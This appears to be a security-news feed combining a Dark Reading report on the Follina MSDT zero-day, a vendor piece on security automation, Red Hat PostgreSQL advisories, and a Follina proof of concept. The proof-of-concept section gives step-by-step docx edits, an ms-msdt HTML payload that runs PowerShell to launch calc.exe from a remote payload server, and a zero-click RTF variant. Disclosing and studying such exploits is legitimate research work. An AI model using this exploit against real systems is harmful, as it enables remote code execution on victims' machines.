"Follina" vulnerability in Microsoft Support Diagnostic Tool (MSDT) affects all currently supported Windows versions and can be triggered via specially crafted Office documents.

Attackers are actively exploiting an unpatched and easy-to-exploit flaw in the Microsoft Support Diagnostic Tool (MSDT) in Windows that allows for remote code execution from Office documents even when macros are disabled.

The vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus, according to security researchers that have analyzed the issue.

Attackers can exploit the zero-day flaw — dubbed "Follina" — to remotely execute arbitrary code on Windows systems. Microsoft has warned of the issue giving attackers a way to "install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights." Researchers have reported observing attacks exploiting the flaw in India and Russia going back at least one month.

**Delayed Acknowledgement?**

Microsoft on Monday assigned the flaw a CVE identifier — CVE-2022-30190 — after apparently initially describing it as a non-security issue in April when crazyman, a security researcher with APT threat hunting group Shadow Chaser Group, first reported observing a public exploit of the vulnerability. Though the company's advisory described the flaw as being publicly known and actively exploited, it did not describe the issue as a zero-day threat.

In a May 30 blog post, Microsoft recommended that organizations disable the MSDT URL protocol to mitigate the issue and said it would provide more updates later without specifying when. Microsoft said the Protected View feature in Microsoft Office and the Application Guard for Office both would prevent attacks that try to exploit the flaw.

Microsoft did not respond to a Dark Reading query on whether it had initially described the issue as a non-security issue or when it might have first learned of the flaw. Instead, a spokeswoman pointed to Microsoft's Monday advisory as the only comment the company has on the issue at this time.

MSDT is a Windows support tool that collects and sends data from a user's system to Microsoft support staff so they can analyze and diagnose issues that a user might be encountering on their system. According to Microsoft, the vulnerability is triggered when an Office app like Word calls MSDT using the URL protocol. "An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application," the company noted.

**Multiple Exploits in the Wild**

Though the security researcher with the Shadow Chaser Group first notified Microsoft Security Response Center about the bug more than a month ago, the vuln only received broad attention over the weekend when a researcher spotted a malicious Word document attempting to exploit the issue. Security researcher Kevin Beaumont analyzed the document and found that it was using the remote template feature in Word to retrieve a HTML file from a remote Web server. The retrieved file in turn used the MS-MSDT URL protocol to load code for executing a PowerShell script. Beaumont discovered the document was executing code even with macros disabled. The security researcher found at least two other malicious Word documents in the wild attempting to exploit Follina going back to April.

Significantly, Beaumont and other researchers found that the attack technique allowed threat actors a way to bypass the "Protected View" mechanism in Office that alerts users about content downloaded from the Internet and requires an additional click from them to open. According to Malwarebytes, the warning can be bypassed simply by changing the document to a Rich Text Format (RTF) file. By doing so, code can run without the user even needed to open the document via the preview tab in Explorer, Malwarebytes said.

"RTF files are a special format that allows for documents to be previewed inside of Windows Explorer," says Jerome Segura, senior director of threat intelligence at Malwarebytes. "When that happens, Explorer will call out the msdt process which is being exploited without any warning or prompts," he says. In fact, the Preview pane is a risky feature because it enables zero-click attacks, Segura says. "We recommend users to disable it within Explorer as well as email clients like Outlook."

**Potentially Widespread Impact**

Johannes Ullrich, dean of research at the SANS Institute, says by itself the vulnerability in MSDT wouldn’t be a big deal. But the fact that it can be triggered via Microsoft Office is troubling. All that a user needs to do is to open a specially crafted Word document, or in some cases just previewing it to enable remote code execution, he says. This sets the stage for potentially widespread compromises especially considering that numerous exploits have been available in the wild for a month now.

"There are multiple scripts, examples and tutorials explaining how to exploit this vulnerability. Applying these techniques is easy, Ullrich says. He points to one malicious document to exploit Follina that SANS discovered recently, which purported to contain quotes for mobile phone prices from a reseller. The exploit worked though it appears to have been compiled by a relatively unskilled threat actor. "It appears to have been created by a novice attacker as it doesn't even remove some of the comments added to the malicious document," Ullrich says.  

He recommends that organizations immediately follow Microsoft's guidance and disable the MSDT URL protocol. "This will break the link between Office and the diagnostic tool," he says. Though the vulnerability in MSDT will still be present, it can no longer be triggered when opening a malicious document, he says. SANS recommends that organizations disable the Preview Pane in Windows Explorer.

Dray Agha, ThreatOps analyst at Huntress, which did a deep dive on the vulnerability, says attackers can use Follina to escalate privileges and travel across environments to create havoc. "Hackers can go from being a low-privilege user to an admin extremely easily," Agha says. "The vulnerability can be easily triggered by users simply choosing to “preview” a specifically crafted, maliciously supplied document. It’s that simple."

New Microsoft Zero-Day Attack Underway

By Owais Sultan
Businesses of all sizes are prone to cyberattacks, and this is no longer a taboo. Malicious actors are…
This is a post from HackRead.com Read the original post: Cybersecurity Automation: How Can Businesses Benefit From It

Businesses of all sizes are prone to cyberattacks, and this is no longer a taboo. Malicious actors are becoming intelligent, and tools are evolving, so what could prevent data breaches or other cybercrimes?

The truth is that it can be pretty hard to fight against cybercriminals, but it’s not impossible. Technology is on your side, and all you need is to reconsider your choices in terms of security.

Traditional methods can be a bit too old in today’s data-driven world, but there are ways to secure your precious corporate data, and automation is one of them. We would say that the best way to combat cyber threats is by making use of the same technology that drives them.

Not to mention that it’s indispensable for businesses to secure their systems given the incommensurable number of data they’re dealing with. Manual labor may be effective, but it couldn’t keep up with the amount of data and operations that need to be secured.

And if we are to mention the costs associated with cyberattacks, you should take measures now; as IBM reports, the cost of a data breach has reached $4.24 million, the highest cost such crimes have known in the last years. Such an enormous cost could break your bank and endanger your business, leading to bankruptcy.

Have a look at this article to find out how automation works and the various benefits of implementing an automated cybersecurity protocol.

**What is cybersecurity automation?**

Before explaining cybersecurity automation, we need to clarify what each concept means. Thus, automation refers to those technologies used to minimize the human labor within an organization (and not only) and increase productivity.

Sectors like the manufacturing industry are already leveraging automation, going the “robots” ways: robotic process automation (RPA) implies machine automation, which means robots working on production lines to minimize human error and boost efficiency.

Cybersecurity refers to the practices that help your enterprise stay away from cyber threats, protecting anything from your customers’ sensitive information to your computer systems. Cybersecurity is not only about responding to actual threats but also about preventing attacks before they happen, which should be one of your main goals.

Cybersecurity automation is the concept used to describe advanced systems based on artificial intelligence (AI) and machine learning (ML). These features help businesses deal with cyber threats and defuse them before affecting crucial operations. Cybersecurity automation fights even against highly developed technologies like deepfake that hackers use to compromise a system.

**Benefits of automating cybersecurity**

If you’re still in doubt, find below some of the most significant advantages of cybersecurity automation alongside some of the functions that organizations can automate to protect their data.

**Generate defenses faster than attacks can spread**

Protecting your businesses from cyber threats is, more often than not, a daunting task that is unlikely to have an end. And with today’s types of cybercrimes, it becomes harder and harder to keep pace with an attack unless you use advanced technology.

Cybersecurity automated systems can stop newly discovered threats and successfully eliminate them so that your endpoints, cloud, or company’s network will be safe from getting infected.

It’s all in vain to manually develop a set of defenses for the various enforcement points to respond to future behaviors; this will only slow you down and increase the risk of error. Besides, it’s challenging to correlate the many security vendors in your environment, so it would be best to choose to cyber secure your systems.

**Reduce redundancy**

One of the most significant benefits of cybersecurity automation is that it reduces redundancy. Some jobs like accounting and client billing, for example, involve repetitive tasks that are often time-consuming. But you no longer have to deal with these issues: use Timesheet Portal software to make expense keeping, accounting, and billing smoother.

IT professionals are also facing redundancy at work, spending a significant amount of their time on repetitive tasks. Businesses should, without any doubt, take measures in this regard, and automating their systems is one of the best practices. This way, they increase employee productivity and system security because, to be honest, cyberattacks are less likely to happen if you install advanced AI tools.

**Improve accuracy**

It’s nothing new under the sun that automation minimizes human error. Robots may have a bad reputation in movies like Transformers, but their real-life impact on compliances and processes is indisputable. The lack of automation in some businesses can lead to severe mistakes and expose the company to data breaches.

That’s why we strongly recommend going the digital route and choosing automated software to keep all your corporate data in a safe place, control access to them, and ensure consistency in performance.

**Correlate data**

Security vendors usually gather significant amounts of threat information but don’t really organize it into actionable steps. In order to do that, enterprises first have to gather dangerous information over attack vectors and from protective technologies, all that by making use of their own infrastructure. This can be not easy if we are to mention that they can’t gather such a tremendous amount of data.

To prevent attacks, you need to collect data from different groups of threats, but you’re unlikely to have enough computing power to measure and analyze the unimaginable threat volume of today’s data-driven world. Thus, consider adopting measures based on cybersecurity automation to make sure no malicious actor could ever compromise your system.

**Simulate attacks**

One of the best ways to fight against an attack is to simulate it. We know it sounds like a fantasy, but technological advancements nowadays allow for this, and business owners out there can only be grateful. These tests can detect potential threats and fight against current ones without putting your system at risk. Automated simulations recreate malicious behavior to discover security gaps in your system and develop protections against future threats.

**Takeaway**

Cybersecurity automation has gained ground, and many business owners using advanced AI and ML to stop cybercrimes in their workplace. With the rise of data breaches and malware, it has become mandatory for businesses to keep their corporate data away from the curious eyes of hackers.

Cybersecurity Automation: How Can Businesses Benefit From It

Red Hat Security Advisory 2022-4807-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:12 security update  
Advisory ID:       RHSA-2022:4807-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4807  
Issue date:        2022-05-31  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (12.11).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.src.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.11-2.module+el8.6.0+15345+1dd8d6b8.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgresql-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-contrib-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-debugsource-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-docs-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plperl-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plpython3-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-pltcl-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-static-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-test-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.6.0+15345+1dd8d6b8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpYjrdzjgjWX9erEAQgYwQ//VF2YxRRrPW2eo/vHN8Ufp+2QiN61A6+I  
K9wYDdBv+K2alBCSRDU6q9XYbD+jY5tCKDPsnMg+Lkt5bopLEHL2YcUSG4n7uUIq  
Xx5sZJNOO+iJgOIEyrAfrt0YVmsmK9JNqGetSjMzG7T/Dveg50k06+citduD5RoX  
MpiDiKDRm127LMutoWWSb/eKTbfskQ0MwbOgtCK9AMVru+qlW6MlcotEV/lnWJwh  
tQcdUaKeqM6FMTi9Xlh1j83uK6tZRN937SPSwvgG7eaZqyN0pr7Tvp04oujl7+6a  
58dvOfZgbc0mIge3qoSkOclDQmHUY5yTcTUfiN88PMX+S1RnT5m+F5bkksOGgmIc  
xnydxHarDwcEVo3TsA3f2jKjdoeEds7hFuVhABJQcXusqbe4hNUFb5Q3xQtdzV3s  
9LEURVeeG/PrpiNzRgmwbqAh8wD/x/LNSHkY488J1mbjJASA+ALY66XSxhiHLXsn  
n3A+o5ttNDRoi88Nzq3tzz9mzXUjpuBzgklQcgs8j7fhYicx50hjirpUiKKsoP/h  
A7weNbq5ZjEov4p1ecVYfFlOQ0tBFD4wNwtFDHPGd98OxjsA5tN20FwPfr9kLYkT  
LkNGlJa9BPdQOhNlSzRzXT11xjRAFfkuM604EtY3MsYPvyvI9h2HUgG/IDR35p+W  
uM9mNBDQM0A=lLhQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4807-01

Proof of concept for the remote code execution vulnerability in MSDT known as Follina.

# POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina 

> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/)

## Summary 

On the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research  
Team, discovered a malicious Office document shared on Virustotal. This document is  
using an unusual, but known scheme to infect its victims. The scheme was not detected as  
malicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to  
code execution without the need of user interaction, as it does not involve macros, except if the  
Protected View mode is enabled. There is no CVE number attributed yet.

## Technical Details

The vulnerability is being exploited by using the MSProtocol URI scheme to load some code.  
Attackers could embed malicious links inside Microsoft Office documents, templates or emails  
beginning with ms-msdt: that will be loaded and executed afterward without user interaction  
- except if the Protected View mode is enabled. Nevertheless, converting the document to  
the RTF format could also bypass the Protected View feature.

## Proof of Concept 

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute

```  
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"  
```

and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`:

```  
Target = "http://<payload_server>/payload.html!"  
TargetMode = "External"  
```

Note the Id value (probably it is "rId5").

3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rId5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`.

NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444).

4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`:

```  
<!doctype html>  
<html lang="en">  
<body>  
<script>  
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times  
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";  
</script>

</body>  
</html>  
```

Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).

## BONUS (0-click RTF version)

If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3:

```  
<o:LinkType>EnhancedMetaFile</o:LinkType>  
<o:LockedField>false</o:LockedField>  
<o:FieldCodes>\f 0</o:FieldCodes>  
```

then it'll work as RTF also (open the resulting docx and save it as RTF).

With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks.

## Sources :

- https://nao-sec.org/about  
- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection  
- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040  
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Microsoft Office MSDT Follina Proof Of Concept

Red Hat Security Advisory 2022-4805-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: postgresql:10 security update  
Advisory ID:       RHSA-2022:4805-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4805  
Issue date:        2022-05-30  
CVE Names:         CVE-2022-1552   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (10.21).

Security Fix(es):

